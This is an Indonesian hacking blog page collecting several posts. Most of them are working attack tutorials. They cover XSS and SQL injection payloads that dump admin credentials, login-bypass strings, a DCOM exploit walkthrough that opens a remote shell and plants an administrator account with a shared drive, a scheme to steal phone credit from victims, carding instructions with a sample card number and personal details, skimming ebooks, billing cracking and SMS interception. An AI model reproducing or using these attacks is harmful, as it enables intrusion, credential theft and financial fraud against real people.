HACKERSURABAYA

6 Tools Untuk Menganalisa Web Host

Disini saya akan sedikit membagikan beberapa link / tools yang dapat digunakan untuk menganalisa suatu web host.

Kegunaannya cukup banyak, selain digunakan untuk mencari tahu informasi – informasi yang diperlukan… Kegiatan Hacking dapat menjadi mudah dan menyenangkan

Tanpa banyak basa – basi langsung aja…

1. DNSstuff

DNSstuff memiliki fasilitas gratis yang cukup banyak. Diantaranya Traceroute, Country IP Range, Wake-on LAN, RFC Lookup dan masih banyak lagi. Dan jika kalian memang membutuhkan fasilitas lebih, silahkan bergabung menjadi member dan dapatkan fasilitas Professional Toolset

2. Who is Hosting This?

Informasi yang bisa kita dapat dari fasilitas yang satu ini adalah Informasi Hosting, IP Hosting, Name Server dan beberapa informasi seperti WhoIs, SnapNames, Sedo, SEMRush, BuiltWith, SeedSpill. Dengan tampilan yang simple membuat kita mudah menggunakannya.

3. Netcraft

Informasi yang didapat cukup banyak dan yang menarik mereka menyediakan Toolbar Antiphising yang dapat kita gunakan pada IE atau FF.

4. YouGetSignal.com

Ini merupakan tools favorit saya. Simple tapi banyak fasilitas yang digunakan. Cobain aja deh…

5. SamSpade.org

SamSpade fungsinya sama dengan WhoIs.

6. GeoTool

GeoTool sedikit berbeda. Selain memberikan informasi IP Address, Hostname dan lain – lain tapi dia juga memberikan gambaran Map yang cukup menarik. Jadi kita bisa melihat dimana lokasinya.

Semoga berguna dan Happy Jumping. Lah kok jumping? Maksudnya selamat mencoba.

Source : http://cruzenaldo.com/tutorial-tips-...lisa-web-host/

»» READMORE...

Skimming for Dummies: Cara Kloning Data Credit/Debit Card

Ebook Skimming for Dummies: Cara Kloning Data Credit/Debit Cards yang saya tulis ini berlisensi Gratis untuk pembaca.

Semua isi dalam tulisan ini adalah fiktif. Hanya mengulas secara umum, tidak mendetail dan bersifat dummies.

Dalam tulisan ini, menceritakan Skimmer dengan bantuan hardware magnetic reader berhasil mengambil alih seluruh informasi dan data yang tersimpan dalam kartu kredit tanpa disadari/diketahui oleh korban. Anda harus membaca dengan tamat. Siapa tahu anda korban Skimmer berikutnya.

Penulis tidak menjamin (memberikan garansi) dan bertanggung jawab jika dalam tulisan fiktif yang ditulis ini mengandung unsur nilai kebenaran.

Jangan pernah terlintas untuk mengirim email untuk bertanya mengenai skimming kepada penulis. Penulis tidak akan menjawab, karena semua ini adalah fiktif. ***

Unduh ebook Skimming for Dummies: Cara Kloning Data Credit/Debit Cards | PDF | 1.1 MB

Download :
http://www.ziddu.com/download/14111747/Creditcard.skimming_ktt.pdf.html

Unduh VideoSkimming for Dummies: Cara Kloning Data Credit/Debit Cards | FLV | 6.4 MB
http://www.4shared.com/file/24732739...dmies-flv.html

»» READMORE...

Simple Basic Common Web Attack

Halo kawan-kawan semuanya, ini sebenernya gue pesembahkan buat devilzc0de yang sedang mengalami guncangan dari pihak asink(cie,cie bahasanya), maksudnya ini gue tulis ketika devilzc0de sedang mengalami suspend diforumnya, semoga ini cepat berlalu dan Devilzc0de cepet exist kembali, terima kasih buat temen2 yang udeh mau bantu berdirinya Devilzc0de sampe saat ini, w cinta loh semuanya, kita adalah familly.
ok, kawan2 langsung saja dari pada tunggu lama, tr malah kesel lagi lama2 w curhat...

oh yah, kenapa gue bisa pilih judul kaya diatas, karena ada buku yang judulnya web attack, nah disni gue cuma mempersimpel jah, bhkan ini basic sekali buat para pemula,bagi yang sudah bisa silahkan tidak usah dibaca tutorial cupu w ok, bagi yang mau baca silahkan aja.

dalam tutorial kali ini w akan membahas beberapa serangan yang sering dilakukan oleh para attacker web atau dengan kata lain tester web:

1.XSS (Cross site scripting)
2.basic SQL injection
3.SQL injection for ASP
4.bypass login
5.File Inclusion (RFI/LFI)
6.RCE (Remote Command Execution)

ok langsung saja kita menuju TKP juragan

0x01::XSS (cross site scripting)

nah loh apa itu??? itu adalah XSS (cross site scripting), wah kenapa namanya bukan jadi CSS???, wah pinter nih , gini loh karena CSS sendiri sudah memiliki arti yakni Cascading style sheet, nah nanti kalo pk singkatan itu jadi rancu donk,hehehe, yah pokoknya begitulah dari yang w pernah tahu n baca,kalo ada yang mau cari lagi silahkan jah kenapa namanya demikia, kalo w sih males, lebih baik langsung ngerti, xii,xii...

XSS adalah satu teknik web attack yang sangat mudah sekali dilakukan, ibaratnya, bug ini adalah sederhana karena attacker hanya menampilkan script yang tertulis di URL addressnya, wah gimana tuh...???? ok, langsung praktek saja

example:

http://namasite.com/aduh.php?xss=welcome+to+mysite

nah dari situ biasanya kita tahu baha web tesebut terkena vulnerable XSS, dari situ kita bisa memainkan URL tersebut menjadi:

example:

http://namasite.com/aduh.php?xss=alert(kamu ganteng deh)

nah nanti bisa kita rubah seperti itu,nanti setelah kita tekan enter maka akan keluar javascript alert dengan tulisan "kamu ganteng deh",hehehe

0x02::SQL injection

nah ini mungkin udeh pada tahu, atau mungkin udeh banyak yang mngerti metode ini, kalo udeh ada silahkan saja yah dilewadkan,

, ini juga serangan attacker yang sering kali digunakan, karena masih banyak sekali site yang vulnerable dengan metode ini, sebelum lebih jauh membahas metode yang satu ini, g ada salahnya kita berkenalan dengan metode ini, karena ada pepatah, ga kenal maka g tahu(jayus loh..gpp yang penting metal..

).

gini loh, sql injection adalah metode web attack dengan melakukan pemberian karakter2 khusus diURL target, jihaha, apalagi itu, saya g ngerti @#$%!@#...wets, sabar donk om, ini mau dikasih contoh, gini loh om, biasanya web tersebut di URLnya diberikan tanda quote,

example:

http://serang.org.sql.php?inject=20'

nah kan diberikan tanda petik tuh, kalo ada pesan error, berarti web tersebut vulnerable dengan sql injection

kemudian kita bisa mencari kolom keberapa yang mengalami masalah

example:

http://serang.org/sql.php?injection=10 order by 1--

example:

http://serang.org/sql.php?injection=10 order by 5--

atau juga bisa mencari dengan metode lain:

example:

http://serang.org/sql.php?injection=-10 union all select 1--

example:
http://serang.org/sql.php?injection=-10 union all select 1,2--

example:
http://serang.org/sql.php?injection=-10 union all select 1,2,3--

dan seterusnya

atau juga bisa

example:

http://serang.org/sql.php?injection=10 and 1=2 union all select 1--

example:

http://serang.org/sql.php?injection=10 and 1=2 union all select 1,2--

example:

http://serang.org/sql.php?injection=10 and 1=2 union all select 1,2,3--

dan seterusnya sampe keluar kolom yang bermasalahnya ok...
nah kalo gitu, karena ini cuma contoh,kita anggap yang keluar adalah kolom ke 3

setelah itu kita bisa mengecek versi sqlnya

example:

http://serang.org/sql.php?injection=-10 union all select 1,2,version(),4,5--

atau

example:

http://serang.org/sql.php?injection=-10 union all select 1,2,@@version,4,5--

kalo seandainya yang keluar versi 4.x.x, maka lewadkan saja, kalo mau dipaksa bisa sih, tapi harus tebak2 tabel dan kolom,hehehe, kalo seandainya yang keluar versi 5.x.x , mari lanjutkan.

untuk mencari tabel yang terdapat dalam site tersebut

example:

http://serang.org/sql.php?injection=-10 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=databasae()--

inget file yang penting adalah:

>>group_concat(table_name)<< == untuk mencari table dari database yang ada.

>>from information_schema.tables where table_schema=database << == diletakan di angka terakhir yang kita dapatkan (lihad contoh diatas)

ok, sekarang kita dapet tabelnya nih, misalnya isi tabelnya sebagai berikut:
admin
user
forum
berita
polling

nah stelah dapet itu selanjutnya kita harus tahu, apa saja sih yang ada didalam tabel itu, tapi tabel yang ingin dicari harus terlebih dahulu kita konvert ke ASCII

example:

http://serang.org/sql.php?injection=-10 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--

61646D696E = admin = dari string kita rubah ke ASCII dengan menambahkan 0xASCII

setelah kita dapet kolomnya, sekarang saatnya kita dump itu kolom, misalkan kolom yang terdapat pada tabel adalah:
id
username
password
email

nah kan udeh tahu kan, dumping deh

example:

http://serang.org/sql.php?injection=-10 union all select group_concat(id,0x3a,username,0x3a,password,0x3a,e mail) from admin--

nah selesai deh, username n password ada ditangan anda, kalo seandainya password yang kita dapet di encrypt dengan md5 silahkan crack saja yah, banyak ko crackan buat md5 yang online tool sekarang..kalo saya sih lebih suka pake toolnya si gunslinger yang md5 cracking, enak tuh...sering dapet..sekalian w promosiin gunslinger tool loh, ok, setelah berhasil di crack atau dapet password dan usernamenya, silahkan cari halaman adminnya, kalo males, pk tool adminpagefinder dari gunslinger juga, sayang toolnya lum bisa update pagenya...hehe, tr kapan2 kita renov ya gunslinger.

0x03::SQL injection for ASP

sebernernya ini sama saja dengan metode SQL injection yang diatas, tapi bedanya hanya dibahasa yang digunakan, kalo yang diatas biasa di pk untuk *.php dan kalo yang ini untuk *.asp..

example:

http://inject.web.id/sql.asp?injection=12'

kalo muncul pesan error kaya gini "Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/news.asp, line 52" berarti bisa kita lanjutkan, selain dari itu, coba2 ajah ok...hehehehe

lanjutkan dengan

example:

http://inject.web.id/sql.asp?injection=12' HAVING 1=1--

error "Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_id' is invalid in the select list because it is not contained in an aggreate function and there is no GROUP BY clause."

cari lagi table dan kolomnya

example:

http://inject.web.id/sql.asp?injection=12' GROUP BY news.news_id HAVING 1=1--

error "Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_detail' is invalid in the select list because it is not contained in an aggreate function and there is no GROUP BY clause."

Error menunjukkan nama column yang ketiga adalah "news_detail"
Untuk mencari nama column yang seterusnya, lakukan seperti langkah selanjutnya dengan menambahkan urutan nama-nama column.
Jika pada akhirnya tidak muncul error, berarti sudah tidak ada lagi column yang di dalam table.

Selanjutnya kita akan menggunakan metode yang lain untuk memanfaatkan error MSSQL dengan command "convert".
Contoh command yang akan ditambahkan diakhir URL (setelah parameter id) adalah: +and+1=convert(int,perintah)--
contoh kita akan melihat versi server:

example:

http://inject.web.id/sql.asp?injecti...t,@@version)--

Pesan error yang muncul:

Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to data type int.
/page.asp, line 9

Dari error tersebut kita mengetahui versi Microsoft SQL dan OS-nya.

Untuk mencari nama databasenya

example:

http://inject.web.id/sql.asp?injecti...t,db_name())--

Error yang dihasilkan:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'cwhdb' to data type int.
/page.asp, line 9

Berdasarkan error maka dapat diketahui bahwa nama database adalah "cwhdb"

Untuk melihat user yang sementara menggunakan database gunakan command user_name(). contoh:

example:

http://inject.web.id/sql.asp?injecti...user_name())--

Error yang dihasilkan:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'sa' to data type int.
/showthread.asp, line 9

Error menunjukkan bahwa user adalah "sa"

Sekarang adalah bagaimana mencari nama table, nama column, dan isinya, dari table information_schema. Perintahnya: +and+1=convert(int,(select+top+1+table_name+from+i nformation_schema.tables))-- >>contoh:

example:

http://inject.web.id/sql.asp?injecti...ema.tables))--

Error yang dihasilkan:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'threads' to data type int.
/page.asp, line 9

Dari query tersebut, dapat diketahui bahwa "threads" sebagai tipe data nvarchar dan tidak bisa diconvert ke data tipe int, maka menghasilkan error.
Dan dengan error tersebut, menunjukkan table yang pertama adalah table "threads".
Selanjutnya mencari table yang kedua. Dengan menambahkan perintah WHERE. contoh:

example:

http://inject.web.id/sql.asp?injecti...eads')))--

/*Penjelasan perintah tersebut, yaitu kita akan mengambil informasi dari table information_schema dimana/dengan nama table tidak/bukan "threads". Atau dengan kata lain kita akan mencari table yang selain table "threads"*/
Maka akan muncul error:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'users' to data type int.
/page.asp, line 9

Error menunjukkan table yang kedua adalah "users". Untuk mencari table yang lain, hanya tambahkan nama table yang telah diketahui. contoh:

example:

http://inject.web.id/sql.asp?injecti...sers')))--

Error yang muncul:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'forums' to data type int.
/page.asp, line 9

Yang berarti nama table yang ketiga adalah table "forums"
Namun jika error yang tampil seperti ini:

ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 10

Maka menandakan bahwa semua table telah ditampilkan dan sudah tidak ada lagi table yang lain.

Selanjutnya mencari nama column dari table. Metodenya hampir sama dengan yang sebelumnya, yaitu masih mencari dari "information_schema" namun perintahnya dari "information_schema.tables" berubah menjadi "information_schema.columns" dan dari "table_name" berubah menjadi "column_name". contoh:

example:

http://inject.web.id/sql.asp?injecti...users'))--

Menampilkan error:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'uname' to data type int.
/showthread.asp, line 9

Dan berdasarkan error diketahui isi column pertama dari table "users" adalah column "uname".
Untuk mencari column yang lain gunakan perintah di akhir URL: and+column_name+not+in+('uname'). contoh:

example:

http://inject.web.id/sql.asp?injecti...name')))--

Menghasilkan error:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'upass' to data type int.
/showthread.asp, line 9

Berdasarkan error, column yang kedua adalah column "upass" yang terdapat dari table "user".
Untuk mencari column yang lain, tambahkan nama column yang telah kita ketahui sebelumnya. contoh:

example:

http://inject.web.id/sql.asp?injecti...pass')))--

Muncul error:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'email' to data type int.
/showthread.asp, line 9

Berarti column yang ketiga adalah column "email".
Tetapi jika error yang dihasilkan adalah:

ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 10

Itu menandakan bahwa sudah tidak ada lagi column yang lain.

Last step, adalah mencari isi dari column yang telah kita ketahui. Seperti ini:

example:

http://inject.web.id/sql.asp?injecti...from+users))--

Error yang muncul:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'admin' to data type int.
/page.asp, line 9

Berarti isi dari column "uname" yang berada di table "users" datanya adalah "admin".
Untuk mencari user yang lain, gunakan data yang telah kita ketahui. contoh:

example:

http://www.example.com/page.asp?id=1...dmin')))--

Jika error yang muncul:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value 'cwh' to data type int.
/page.asp, line 9

Berarti username yang lain adalah "cwh". Dan untuk mencari user yang berikutnya, tambahkan username yang telah diketahui. contoh:

example:

http://inject.web.id/sql.asp?injecti...;cwh')))--

Dan jika errornya:

ADODB.Field error '800a0bcd' Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/showthread.asp, line 10

Berarti hanya ada 2 user yaitu "admin" dan "cwh".

Dan untuk mencari passwordnya, perintahnya seperti:

example:

http://inject.web.id/sql.asp?injecti...from+users))--

Dan jika error yang ditampilkan adalah:

Microsoft SQL Native Client error '80040e07' Conversion failed when converting the nvarchar value '123' to data type int.
/page.asp, line 9

Maka isi dari data yang pertama di column "upass" adalah "123".
Dari hasil yang kita dapat diatas, isi data pertama dari column "uname" adalah "admin", dan isi data pertama dari column "upass" adalah "123".
Berarti usernamenya adalah "admin" dan passwordnya "123"

0x04::bypass Login

emh apa yah...sebenernya sih pengertian ini w buat berdasarkan pengalaman w yah, masalahnya w mau cari referensi yang agak enak w pahamain pada sulit2..
...akhirnya jad lah kesimpulan bypass menurut w...bypass adalah teknik hacking untuk login ke suatu site dengan memanfaatkan kesalahan dari si programmer di form login...
begitu kira2 menurut w brother...

ini sedikit list yang biasa di gunakan untuk bypass halaman website:

'or'
1'or'1'='1
having 1=1--
x'or'x'='x
dan masih banyak lagi silahkan anda kembangkan dan cari lagi, seperti biasa, in google..hehehe

0x05::File Inclusion

hello bro..ini dia kita memasuki tahap yang dibilang banyak dilakukan oleh para hacker indonesia yang sering main atau nongkrong di irc,hehehe
file inclusion ini terbagi 2 bagian:
1.Remote FIle Inclusion
2.Local File Inclusion

nah sini w bahas yang RFI dulu yah..

RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server. nah ngerti g tuh bro...jadi gampangnya gini loh...jadi dari luar server kita bisa melakukan kaya kita didalam server, nah gitu bro...

nah kemudian LFI

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.

nah disni saya akan memberikan bug terjadinya RFI dan LFI..

> [Penjelasan ]
< fungsi-fungsi yang dapat menyebabkan LFI/RFI:include(); include_once(); require(); require_once(); Dengan syarat pada konfigurasi php di server: allow_url_include = on allow_url_fopen = on magic_quotes_gpc = off contoh: misalkan kita punya file index.php dengan content kodenya seperti ini, Code: include "../$_GET[framefile]"; ?>

0x06::RCE (Remote Command Execution)

RCE...wah apa tuh baru denger nih...???? wah kaka, masa sih baru denger..ini adalah salah satu serang yang sering digunakan oleh attacker di indonesia juga..dari namanya juga kita pasti tahu apakah itu..itu adalaha bagaiman si attacker mampu menexecute perintah2 dengan meremote server yang vulnerable dari site

sebagai contoh saya bisa kasih link saja yah tentang RCE ini

untuk mencari RCE anda bisa buka
http://www.milw0rm.com/papers/369

untuk bermain RCE dengan LFI, loh bisa baca
http://www.milw0rm.com/papers/361
http://www.milw0rm.com/papers/260

nah sisanya anda cari lagi yang mengenai RCE, sebenernya RCE bukan hanya ada di bug LFI, tapi masih banyak lagi, seperti di phpmyadmin dan lain-lain..

»» READMORE...

Chat menggunakan mig33 Gratis

Bagi kalian yang suka dengan gratisan, saya memiliki cara untuk Chat melalui HP tanpa menghabiskan pulsa...

Kalian Ikuti Cara Di Bawah ini :

1. kamu masuk aplikasi mig33 ( http://wap.mig33.com/join.php ) Tanpa Tanda Kurung , ( Gunakan Browse Mobile Anda ) Jangan Lewat PC Atau Warnet ( Notebook ) Anda,. Tanpa Tanda Kurung ,

2. Setelah Itu , Langsung Aja regristrasi ( Daftar ), kamu isi username, password, dan no hp (no. Korban yg akan kamu sedot pulsanya),

3. lalu submit, setelah itu kamu login dan pilih remind me later,

4. lalu kamu plih invite friend no tujuan kamu isi "TP(spasi)no.kamu(spasi)jumlah pulsa"( Tanpa Tanda Kutip ) , Yang Ingin Kamu Curi Dari Si Korban ,
( Yang Mesti Di Ingat , Misalkan Kamu Ingin Mencuri Pulsa Si Korban Sebanyak 50.000 , Akan Tetapi Pulsa Si Korban Hanya 20.000 , Maka Akan Terjadi Erorr ,Itu Di Karenakan Pulsa Si Korban Tidak Mencukupi Untuk Kamu Curi )

Contoh 1 :
Sebut Aja Kamu Dengan Nama Si " A " ( Si Pelaku Pencurian )
Dan Sebut Aja Si Korban Yang Ingin Kamu Curi Pulsa'a , Si " B "

SI "A" ---- > TP 08565555555 50000
Keterangan : Brati Si A Mencuri Pulsa Dari No Hp 08565555555 Sebanyak Rp.50.000

Si "B" ----- > Sementara Si " B " Pulsa'a Hanya Rp. 20.000

Apabila Kaya Seperti Di Atas , Kemungkinan Akan Terjadi Erorr ,Karena Pulsa Si " B " Hanya Rp.20.000 Sedangkan Si " A " Mencuri Rp.50.000 Dari Si "B" Yang Terjadi Adalah Pulsa Si B Tidak Mencukupi Target Yang Di Minta Oleh Si "A" , Maka Terjadilah Erorr .... Tapiiii ... Apabila DewiFortuna Di Pihak Anda Maka Cara Seperti ini pun Berhasil .... Maka Pulsa SI "B" Yang Rp.20.000 Tidak Tersisa Sepeserpun Untuk Si "B".

Nah ... Untuk Melakukan Yang Benar Dan Tidak Terjadi Erorr,,,, Gw Punya Tips ...

Ikuti Tips Di Bawah Ini :

1. Lo Mesti Tau Betul Orang Yang Ingin Lo Curi Pulsa'a ( Untuk Percobaan ) Lo Curi Pulsa Ade Lo Atau Kaka Lo Sndri

2. Lo Mesti Pulsa Dari Ade Atau Kaka Lo Yang Ingin Di Curi

3. Ini Di Karena Agar Lo Tau Betul Dan Yang Diperlukan Dalam Teknik Ini adalah Mengira-Ngira Isi Pulsa Si "B". Jangan Sampai Melebihi Dari Target Yang Lo Minta Ke Si "B"
Misalkan : Misal Si B Mempunyai Pulsa Rp. 30.000 , Maka Yang Harus Lo Lakuin Adalah , Jangan Melebihi Pada Saat Mencuri Pulsa Si B , Cara Seperti ini Kemungkinan 99,9% Sukses , Di Bandingkan Cara Sebelumnya ,

Contoh Yang Benar :

TP 085555555 29500 ( Maka Yang Akan Terjadi Adalah Pulsa Si "B" Hanya Kamu Sisain Rp.500 Perakkkk ..... )

Keterangan :
TP ----- > Perintah Tranfer Pulsa Untuk Operator M3 , Untuk kartu lain sesuaikan kode transfernya.

085555555 ----- > Nomer Hp Si Korban Yang Ingin Kamu Curi

29500 -------- > Jumlah Pulsa Yang Ingin Kamu Curi

Selamat NgeHack Pulsa Teman Anda ....
Jangan Di Gunakan Untuk Hal-Hal Yang Tidak Benar Ya .....

»» READMORE...

Kismet di Windows

Bagi anda pengguna atau penggemar Open Source terutama BackTrack Kismet adalah bukanlah tools yang asing lagi, tools ini sangat ampuh untuk membobol jaringan Wifi, kismet adalah salah satu tools yang ada di OS Open Source tapi kemarin saya penasaran dan mencari Kismet ini dalam versi windows, agak susah mendapatkannya, dan sungguh mantap, Kismet ini suport :

Windows Xp
Windows Vista
Windows 7

Jadi anda tanpa perlu menginstall Linux bisa menggunakan tools ini

Silahkan Download di SINI

»» READMORE...

Memblokir Situs dalam PC Anda

Berikut ini adalah trik keren di mana Anda dapat memblokir situs web apapun untukdapat diakses dari PC Anda. Trik ini tidak memerlukan penggunaan perangkat lunakatau program.
1] Browse C: \ WINDOWS \ system32 \ drivers \ etc

2] Cari file yang bernama "HOSTS"

3] Buka di notepad

4] Under "127.0.0.1 localhost" Tambahkan 127.0.0.2 www.sitenameyouwantblocked.com, dan situs yang akan tidak dapat diakses lagi.

5] Selesai!
misalnya
127.0.0.1 localhost
127.0.0.2 www.blockedsite.com

»» READMORE...

Crack Billing dengan Ecafepro Client

Kali ini saya menemukan sebuah tools yang sangat berguna untuk menghentikan waktu Billing anda saat anda internet di Warnet, Ecafepro Client bisa membantu anda.
Semoga bermanfaat dan jangan terlalu sering di gunakan karena semua resiko di tanggung sendiri.
:-)

Silahkan Download di SINI

»» READMORE...

Masuk komputer lain dengan system operasi win xp/2000 dengan DCOM Exploit (II)

Masuk komputer lain dengan system operasi win xp/2000 dengan DCOM Exploit (II)

---------------------------------------------------------

Yang dimaksud DCOM exploit disini adalah kaht,Langkah pertama yaitu download program kaht ii terlebih dahulu (search pakek google) letakkan di directory sesuai dengan keinginan anda, biasanya bentuk file dalam Zip coba extract file tersebut setelah ter exstrack kaht bisa digunakan.

Selanjutnya tentukan alamat ip target misal : 192.168.0.12

selanjutnya : Kaht 192.168.0.11 192.168.0.12

keterangan :

192.168.0.11 adalah IP (komputer tagret) awal

192.168.1.12 adalak IP (komputer target) akhir

karena disini kita akan mengexploitasi ip 192.168.0.12 kita gunakan kaht 192.168.0.11 192.168.0.12 karena ip 192.168.0.11 merupakan range terkecil agar exploitasi berjalan lebih cepat sesuai dengan target kita.

Jika komputer target berhasil di exploitasi maka akan muncul akan muncul tampilan kurang lebih sebagai berikut :

---------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION :) AUTOHACKING
----------------------------------------------------------------------------
[+] Targets : 192.168.0.11-192.168.0.12 eith 50 Threads
[+] Attacking Port. Remote Shell At ports: 36388
[+] Scan in Progress....
- Connecting to 192.168.0.12
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...

Microsoft Windows 2000 [VErsion 5.00.2195]
Copyright 1985-2000 Microsoft Corp.

c:\WINNT\system32>

Sampai disini kita sudah berhasil masuk ke komputer target dan kita berada di directory kerja c:\WINNT\system32>

Sampai disini terserah anda mau malkukan apapun, sesuai keinginan anda disini kita akan coba malakuakn sharing file dan membuka file sharingan tersebut di komputer kita dengan terlebih dahulu menambahkan user ID setingkat administrator.

Untuk melakukan penambahan user di pc Target

C:WINNTsystem32>net user spyro login /add

net user spyro login /add
The command completed successfully.

Perintah yang kita gunakan diatas adalah perintah [net user] [nama_user] [password_user] [/add]. Jadi, sesuai dengan contaoh diatas maka kita telah membuat "spyro" sebagai nama user dan passwordnya adalah "login".
Setelah user berhasil dibuat selanjutnya kita memberikan autority pada user spyro dalam groups administrator

C:\WINNT\system32>net localgroup Administrators spyro /add

net localgroup Administrators spyro /add
The command completed successfully.

Perintah [net localgroup] [Nama_gorups] [nama_user] [/add] akan menambahkan user spyro kedalam groups daministrator pada kumputer local (komputer target), administrators adalah grups dari administrator tersebut dan untuk spyro adalah nama user yg ditambahkan dalam gruop administrator.

setelah berhasil masuk, cobalah buat user gruops administrator

C:WINNTsystem32>net user spyro login /add

setelah itu masukan user spyro ke groups administrator

C:WINNTsystem32>net localgroup Administrators spyro /add

setelah itu sharing drive-nya

C:WINNTsystem32>net share c=c:

catatan user id nya terserah lo kasih apa sesuai keinginana lo..
oh ya

untuk menggunakan sharing drive tersebut bisa gunakan perintah net use

pertama buka dos promt baru di komputer kita
selanjutnya ketik berikut:

c:> net use * \\ip_address\drive_c * /u:spyro
Type the password for \\ip_addres\C: <--- masukan password disini ket : berdasarkan perintah diatas IP_address adalh IP komputer target dan drive_c adalah nama sharing drive dari komputer taget dan untuk u:/spyro bahwa kita masuk dengan menggunakan user paluared (biasanya di dalam winxp/win2000 terdapat sharing defaultnya yaitu C$, d$ dst, jika ini sang admin belum merubah hal tersebut kita dapat langsung melakukan net use atau tanpa melakukan net share berdasarkan default sharing ini ) cat IP-Addres bisa juga di isi dengan nama computer untuk keterangan nya lo bisa baca manualnya net use /? setelah berhasil bisa liat di windows explorer C:\WINNT\system32>net share drive_c=c:\

drive_c adalah nama sharing sedangkan c:\ adalah drive yang kita sharing.

net share Drive_c=c:\
c was shared successfully.

ket : berdasarkan perintah diatas kita melakukan telah sharing drive yaitu drive C dengan memberikan nama drive_C

Bisa Download Di SINI

»» READMORE...

Tutorial Carding Terbaru

Carding, sebuah ungkapan mengenai aktivitas berbelanja secara maya (lewat komputer), dengan menggunakan, berbagai macam alat pembayaran yang tidak sah. pada umumnya carding identik dengan transaksi kartu kredit, dan pada dasarnya kartu kredit yang digunakan bukan milik si carder tersebut akan tetapi milik orang lain.

apa yang terjadi ketika transaksi carding berlangsung, tentu saja sistem pembayaran setiap toko atau perusahaan yang menyediakan merchant pembayaran mengizinkan adanya transaksi tersebut. seorang carder tinggal menyetujui dengan cara bagaimana pembayaran tersebut di lakukan apakah dengan kartu kredit, wire transfer, phone bil atau lain sebagainya.

cara carding sebagai berikut:

1. mencari kartu kredit yang masih valid, hal ini dilakukan dengan mencuri atau kerjasama dengan orang-orang yang bekerja pada hotel atau toko-toko gede (biasanya kartu kredit orang asing yang disikat). atau masuk ke program MIRC (chatting) pada server dal net, kemudian ke channel #CC, #Carding, #indocarder, #Yogyacarding,dll. nah didalamnya kita dapat melakukan trade (istilah “tukar”) antar kartu kredit (bila kita memiliki kartu kredit juga, tapi jika tidak punya kartu kredit, maka dapat melakukan aktivitas “ripper” dengan menipu salah seorang yang memiliki kartu kredit yang masih valid).

2. setelah berhasil mendapatkan kartu kredit, maka carder dapat mencari situs-situs yang menjual produk-produk tertentu (biasanya di cari pada search engine). tentunya dengan mencoba terlebih dahulu (verify) kartu kredit tersebut di site-site porno (hal ini disebabkan karena kartu kredit tersebut tidak hanya dipakai oleh carder tersebut). jika di terima, maka kartu kredit tersebut dapat di belanjakan ke toko-toko tersebut.

3. cara memasukan informasi kartu kredit pada merchant pembayaran toko adalah dengan memasukan nama panggilan (nick name), atau nama palsu dari si carder, dan alamat aslinya. atau dengan mengisi alamat asli dan nama asli si empunya kartu kredit pada form billing dan alamat si carder pada shipping adress. (mudahkan?…..)

jenis kartu kredit:

1. asli didapatkan dari toko atau hotel (biasa disebut virgin CC)

2. hasil trade pada channel carding

3. hasil ekstrapolet (penggandaan, dengan menggunakan program C-master 4, cardpro, cardwizard, dll), softwarenya dapat di Download disini: Cmaster4, dan cchecker (jika ada yang ingin mengetahui CVV dari kartu tersebut)

4. hasil hack (biasa disebut dengan fresh cc), dengan menggunakan tekhnik jebol ASP (dapat anda lihat pada menu “hacking“)

Contoh kartu kredit:

First Name* Judy
Last Name* Downer
Address* 2057 Fries Mill Rd
City* Williamstown
State/Province* NJ
Zip* 08094
Phone* ( 856 )881-5692
E-mail* serengeti@erols.com
Payment Method Visa
Card Number 4046446034843451
Exp. Date 5/04

(Tapi kegiatan semacam ini merupakan tindakan kriminalitas)

»» READMORE...

nyadap sms

saya akan memberikan anda beberapa tips trik rahasia untuk menyadap sms nomer teman anda. Biasanya, trik ini digunakan para detektif tuk mensadap HP seseorang. Baik itu SMS maupun Telepon. ( kok saya bisa tahu trik ini?) Tetapi saya hanya akan menjelaskan kepada anda cara menyadap sms. Menakutkan bila menyadap/sadap telepon. Artikel ini hanya sebagai hiburan saja. Jangan memakainya dengan maksud jahat karena perbuatan dosa anda akan sangat besar. Tujuannya, supaya kita bisa setia dengan pacar kita, tidak ada yg berani selingkuh, dan supaya tidak ada teman kita yang menghianati kepercayaan. Kalo saya se..buat adek saya aja, soalnya dia nakal dan suka boong lwt sms. Anda mau tahu kan caranya? setelah anda tahu rahasia ini, anda wajib komentar lo!

Tentu saja ada persyaratan yg harus dipenuhi :

Dilarang Memakai ini untuk perbuatan lainnya kecuali untuk hiburan
HP adalah HP symbian. Baik HP anda maupun HP teman anda.
Merek NOKIA
Memiliki aplikasi simbyan (smsanywherelite.sis)

